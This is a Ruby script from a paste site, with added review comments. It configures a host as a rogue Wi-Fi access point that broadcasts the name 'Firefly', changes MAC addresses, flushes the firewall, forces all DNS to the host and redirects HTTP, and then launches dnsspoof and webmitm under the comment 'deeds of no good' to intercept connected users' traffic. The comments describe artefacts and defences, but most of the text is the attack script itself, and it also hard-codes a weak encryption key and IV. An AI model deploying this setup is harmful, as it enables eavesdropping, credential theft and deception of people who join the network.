
Untitled

a guest
Jun 27th, 2017
Ruby 9.09 KB | None | 0 0
  1. #!/usr/bin/ruby
  2. #capn-jack_mr_hai_signature_string
  3. # This is a work in progress; I'm going to eventually make a complete handler for a wireless router.
  4. # I started trying to write WAP software in Ruby, but after a while I realized that I shouldn't reinvent the wheel;
  5. # I should just make a really good car. I'm going to incorporate a bit of C and Python as well: the C to speed it up and the Python
  6. # for some packet manipulation in the stream using Scapy.
  7. # The configuration options are all constants. I figured that instead of asking each time (since people generally have a
  8. # consistent setup) you set them in the code. The class "packet_filter" is the filter (no really?!?!); I generally use nested ifs
  9. # for the heuristics, but you can do whatever here.
  10.  
  11. #install script
  12. #timed saves to pcap if ACTBAD, selective ports, most useful for tcp reconstruction
  13. require 'socket'
  14. require 'openssl'
  15. require 'packetfu'
  16. #find alternatives to avahi and network manager
  17. #maybe make a WAP connection script?
  18. # iw? ifconfig? both !
  19. #airodump to showcase the area, iwconfig to connect
  20. #dhclient to get an IP
  21.  
  22.  
  23. #ACL from ruby doc
  24. # have it be invoked as a response to snort
  25. #
  26.  
#general config
# All settings are top-level constants and globals fixed in the source; nothing is read
# from the command line or the environment.
#
# NOTE(review): KEY and IV are hard-coded, identical to each other, and built from a
# keyboard walk, so anyone holding this source can decrypt whatever the Encryption class
# produces. A fixed IV under CBC also makes equal plaintext prefixes encrypt to equal
# ciphertext prefixes. IV is 32 bytes long, while the AES block (and CBC IV) size is 16.
KEY = "qwertyuiopasdfghjklzxcvbnmqwerty"
IV = "qwertyuiopasdfghjklzxcvbnmqwerty"
# $ACTBAD and LOGGING are assigned here but not read anywhere in this paste.
$ACTBAD=true
# $VERBOSE is Ruby's own warning-level global, so this line turns on interpreter warnings.
$VERBOSE = true
LOGGING= true
# Interface roles as they are used further down: MONITOR is the monitor-mode interface,
# EXTIF the uplink, TUNNEL the interface the DHCP server and NAT rules are bound to,
# INTIF the wireless card that is switched to monitor mode.
MONITOR="mon0"
EXTIF="eth1"
TUNNEL="at0"
INTIF="wlan1"
TTY="/dev/tty10"
# CHAN and ESSID are the channel and network name passed to the soft access point.
# The ESSID is broadcast, so it is visible to clients and to wireless monitoring.
CHAN = "9"
ESSID="Firefly"
# Both backtick lines run a shell command as a side effect of loading the file.
# The second one kills the host's avahi-daemon with SIGKILL.
`alias wpas='sudo killall -9 wpa_supplicant'`
`sudo killall -9 avahi-daemon `
#DHCP config
# Values interpolated into the dhcpd.conf, interfaces and bind templates below.
# DOMAIN is handed to every client as the DHCP domain-name option, which makes it a
# usable indicator in client-side lease logs.
RANGE="192.168.1.2 192.168.1.254"
SCOPE="192.168.1.0"
GATEWAY="192.168.1.1"
MASK="255.255.255.0"
BROADCAST="192.168.1.255"
DOMAIN="cerberusrouter.net"
# Resolver addresses advertised to clients in the DHCP lease (OpenDNS public resolvers).
DNS1="208.67.222.222"
DNS2="208.67.220.220"
  51.  
  52.  
  53.  
  54. #Handles encryption
  55. #example
  56. #   #preparing my balls for encryption
  57. #   balls = Encryption.new("balls")
  58. #   #encrypting my balls
  59. #   balls.encrypt_payload
  60. class Encryption
  61.     def initialize (string)
  62.         @string = string
  63.     end
  64.     #encrypts
  65.     def encrypt_payload
  66.         cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
  67.         cipher.encrypt
  68.         cipher.key = WAPinit::KEY
  69.         cipher.iv = WAPinit::IV
  70.         cipher.update(@string) + cipher.final
  71.        
  72.     end
  73.     #decrypts
  74.     def decrypt_payload
  75.         cipher = OpenSSL::Cipher::Cipher.new('aes-256-cbc')
  76.         cipher.decrypt
  77.         cipher.key = WAPinit::KEY
  78.         cipher.iv = WAPinit::IV
  79.         cipher.update(@string) + cipher.final
  80.     end
  81.    
  82. end
# NOTE(review): unfinished stub. Only @host is stored; port, header and max_connect are
# accepted but never used, and the paste leaves this definition without a closing `end`.
class Http_server
  def initialize(port, header, max_connect, host,)
    @host = host #(insert php server self here)
  86.  
#instances of this class start the show
#
# Turns the host into a NAT-ing wireless access point. Every statement sits directly in
# the class body rather than in a method, so the work is written to happen when the class
# definition is evaluated, not when WAPinit.new is called.
#
# NOTE(review): this paste does not parse as Ruby as written, so the comments below
# describe what each step is written to do rather than observed behaviour.
#
# Steps, in order:
#   1. restart host networking
#   2. build the text of three config files from the constants above
#   3. overwrite /etc/network/interfaces and add routes
#   4. stop wpa_supplicant / avahi, enable monitor mode, start the soft AP
#   5. load netfilter modules, flush iptables, install NAT, DNS and HTTP redirect rules
#   6. overwrite the DHCP server config and start dhcpd on the tunnel interface
#   7. overwrite the bind options file and restart bind9
#
# Host artefacts useful in triage: the three config files are overwritten in place with no
# backup, the existing iptables ruleset is flushed, ip_forward and ip_dynaddr are set to 1,
# wpa_supplicant and avahi-daemon are killed, and airbase-ng / dhcpd3 are left running.
class WAPinit
`/etc/init.d/networking restart`
#file contents of the bind and DHCP servers and the interface file
# Template for /etc/network/interfaces: EXTIF via DHCP, INTIF with a static address.
interfaces = <<INTERFACE
#loopback interface
    auto lo iface lo inet loopback
 
    # interface external network (internet), configured through dhcp
    auto #{EXTIF}
    iface #{EXTIF} inet dhcp
 
    #interface network 1
    auto #{INTIF}
    iface #{INTIF} inet static
            address #{GATEWAWY}
            netmask #{MASK}
            network #{SCOPE}
            broadcast #{BROADCAST}
 
 
 
INTERFACE

# Template for /etc/bind/named.conf.options; the only forwarder listed is GATEWAY.
bind = <<BIND
options {
    directory "/var/cache/bind";
   
    forwarders {
        #{GATEWAY};
       
    };
 
    auth-nxdomain no;    # conform to RFC1035
    listen-on-v6 { any; };
};
BIND


# Template for the DHCP server config. Clients are told to use DNS1/DNS2, but the
# PREROUTING rule further down sends UDP/53 to GATEWAY regardless, so the resolver shown
# in a client's lease does not reveal where its queries are actually answered.
dhcp3 = <<DHCP
ddns-update-style interim;                                  
ignore client-updates;
 
subnet #{SCOPE} netmask #{MASK} {
 
        range #{RANGE};                  
           option subnet-mask              #{MASK};    # Default subnet mask to be used by DHCP clients
           option broadcast-address        #{BROADCAST};    # Default broadcast address to be used by DHCP clients
           option routers                  #{GATEWAY};      # Default gateway to be used by DHCP clients
           option domain-name              "#{DOMAIN}";
           option domain-name-servers      #{DNS1}, #{DNS2};           # Default DNS to be used by DHCP clients
}
#         DHCP requests are not forwarded. Applies when there is more than one ethernet device and forwarding is configured.
#       option ipforwarding off;
 
         default-lease-time 21600;                            # Amount of time in seconds that a client may keep the IP address
        max-lease-time 43200;
 
        option time-offset              -18000;              # Eastern Standard Time
#       option ntp-servers              192.168.1.1;         # Default NTP server to be used by DHCP clients
DHCP
# Status banner (ANSI colour codes) listing the configured interfaces.
printf "\033[00;31m[SYSTEM]\033[00m   TTY output Being Directed to \033[00;31m#{TTY}\033[00m\n"
printf "\033[00;34m[NETWORK]\033[00m External Interface: \033[00;31m#{EXTIF}\033[00m\n"
printf "\033[00;34m[NETWORK]\033[00m Monitor Interface:  \033[00;31m #{MONITOR}\033[00m\n"
printf "\033[00;34m[NETWORK]\033[00m Internal Interface: \033[00;31m#{INTIF}\033[00m\n"
printf "\033[00;34m[NETWORK]\033[00m Tunnnel Interface:  \033[00;31m #{TUNNEL}\033[00m\n"
printf "\n\033[00;31m[SYSTEM]\033[00m Configuring Interfaces\n"
printf "\033[00;35m===============================================================\033[00m\n"
# Overwrites the host's interface configuration in place; the handle is never closed.
ifaces = File.open("/etc/network/interfaces", "w")
ifaces.syswrite(interfaces)
`route add -net -n #{SCOPE} netmask #{MASK} dev #{INTIF}`
`route add -net -n 0.0.0.0 dev #{EXTIF}`
# The command output is used as the printf format string, so a '%' in it would be
# read as a format directive.
printf `route`

printf "\033[00;35m===============================================================\033[00m\n"
printf "\033[00;31m[SYSTEM]\033[00m Interfaces Configured\n"

# Branches on the interface names present in `ifconfig` output: an existing mon*
# interface or at* interface skips setup; a wlan* interface triggers the AP bring-up.
if `ifconfig`.match(/mon[0-9]/) = true
     printf "monitor mode previously enabled skipping"
   elsif `ifconfig`.match(/at[0-9]/) = true
     printf "WAP already active, skipping"
   elsif `ifconfig`.match(/wlan[0-9]/) = true
#     `sudo killall -9 NetworkManager`
     # Services that manage the wireless card are killed with SIGKILL; their sudden
     # disappearance is visible in process and service-manager logs.
     `sudo killall -9 avahi-daemon`
     `killall -9 wpa_supplicant`
     `airmon-ng start #{INTIF} #{CHAN}`
     `gnome-terminal -e airodump-ng #{MONITOR}`
     # changemac is not defined in this paste; presumably a local helper that alters the
     # interface MAC address - confirm. If so, MAC-based attribution of this AP is unreliable.
     `changemac #{EXTIF}`
     `changemac #{INTIF}`
     printf "\033[00;31m[SYSTEM]\033[00m Monitor Mode Enabled on #{INTIF}  \n"
     printf "\033[00;31m[SYSTEM]\033[00mActivating Wireless Access Point \n"
     `killall -9 wpa_supplicant`
     # The soft AP runs in a forked child that is detached, so it is not waited on here.
     # It advertises ESSID on channel CHAN through the monitor interface; wireless
     # intrusion detection can flag an unexpected BSSID announcing a known network name.
     pid = fork do
       `airbase-ng -e #{ESSID} -v -v -c #{CHAN} -I 5000 #{MONITOR} 2>&1`
     end
    Process.detach(pid)
   else printf "Something happened with the interfaces, please configure your system and plug in any devices"
  end
sleep 4
`ifconfig #{TUNNEL} up`
#begin the router-fu!
# Netfilter / connection-tracking modules needed for the NAT rules below.
`modprobe ip_tables`
`modprobe iptable_filter`
`modprobe ip_conntrack`
`modprobe ip_conntrack_ftp`
`modprobe ip_conntrack_irc`
`modprobe iptable_nat`
`modprobe ip_nat_ftp`
`modprobe ip_nat_irc`

printf "\033[00;31m[SYSTEM]\033[00m Done loading modules\n"
printf "\033[00;31m[SYSTEM]\033[00m Enabling DynamicAddr\n"
`echo "1" > /proc/sys/net/ipv4/ip_dynaddr`

printf "\033[00;31m[SYSTEM]\033[00m Resetting IPTables Rules\n"
# Discards whatever firewall policy the host had: all chains flushed, INPUT and OUTPUT
# default to ACCEPT, FORWARD defaults to DROP until the rules below are added.
`iptables --table nat --flush`
`iptables --delete-chain`
`iptables --flush`
`iptables -P INPUT ACCEPT`
`iptables -F INPUT `
`iptables -P OUTPUT ACCEPT`
`iptables -F OUTPUT `
`iptables -P FORWARD DROP`
`iptables -F FORWARD `
`iptables -t nat -F`

printf "\n\033[00;31m[SYSTEM]\033[00m Configuring Routing Tables\n"
printf "\033[00;35m===============================================================\033[00m\n"

# Client traffic entering on TUNNEL is forwarded to EXTIF and source-NATed (MASQUERADE).
`iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -j ACCEPT`
`iptables -A FORWARD -i #{TUNNEL} -o #{EXTIF} -m state --state ESTABLISHED,RELATED -j ACCEPT`
`iptables -A INPUT -i #{TUNNEL} -m state --state ESTABLISHED,RELATED -j ACCEPT`
`iptables -A INPUT -i lo -s 0/0 -d 0/0 -j ACCEPT`
`iptables -A POSTROUTING -t nat -o #{EXTIF} -j MASQUERADE`
# Every UDP/53 packet, on any interface, is rewritten to GATEWAY, so plain DNS from
# clients is answered by this host whatever resolver they configured. Resolvers reached
# over an encrypted transport are not matched by this rule.
`iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to #{GATEWAY}` #dns
# Clear-text HTTP from clients is delivered to local port 80 on this host instead of its
# destination. HTTPS-only browsing and HSTS keep clients off this path.
`iptables -t nat -A PREROUTING -i #{TUNNEL} -p tcp --dport 80 --j REDIRECT --to-ports 80`

`echo "1" > /proc/sys/net/ipv4/ip_forward`
printf "\033[00;35m===============================================================\033[00m\n"
printf "\033[00;31m[SYSTEM]\033[00m IPTables Configured\n"
printf "\n\033[00;31m[SYSTEM]\033[00m Configuring DHCP\n"
printf "\033[00;35m===============================================================\033[00m\n"
`ifconfig at0 up`
`ifconfig at0 #{GATEWAY} netmask #{MASK}`
`ifconfig at0 mtu 1500`
# Overwrites the DHCP server config in place (handle never closed), then starts the
# server on the tunnel interface.
dhcpconf = File.open("/etc/dhcp3/dhcpd.conf", "w")
dhcpconf.syswrite(dhcp3)
`dhcpd3 #{TUNNEL}`
printf "\033[00;35m===============================================================\033[00m\n"
printf "\033[00;31m[SYSTEM]\033[00m DHCP Server Configured\n"
printf "\n\033[00;31m[SYSTEM]\033[00m Configuring DNS\n"
printf "\033[00;35m===============================================================\033[00m\n"
# Overwrites the bind options file in place (handle never closed) and restarts bind9.
dnsf = File.open("/etc/bind/named.conf.options", "w")
dnsf.syswrite(bind)
printf `/etc/init.d/bind9 restart`
printf "\033[00;31m[SYSTEM]\033[00m DNS Caching Configured\n"
printf "\033[00;35m===============================================================\033[00m\n"
`notify-send "#{ESSID} - Wireless Access Point initialized"`
end
  246.  
#Starting the server
# WAPinit defines no methods, so this call only creates an empty instance.
WAPinit.new

# So far we have accomplished the task of initiating a WAP, starting DHCP, configuring the routing tables for
# transparency and configuring the interfaces.

#now we begin the deeds of no good

# dnsspoof and webmitm are not defined in this file; they look like the dsniff utilities
# of the same names - confirm. dnsspoof forges answers to DNS queries seen on the tunnel
# interface. Clients see this as names resolving to an unexpected address; DNSSEC
# validation or an encrypted resolver transport prevents the forged answer from being used.
`dnsspoof -i #{TUNNEL}`
sleep 1
# webmitm relays HTTP/HTTPS and presents its own certificate to the client, so a client
# that validates certificates gets a trust error, and HSTS-protected sites do not allow it
# to be bypassed. An unexpected certificate issuer on a familiar site is the visible sign.
`webmitm -d -d -d`
sleep 1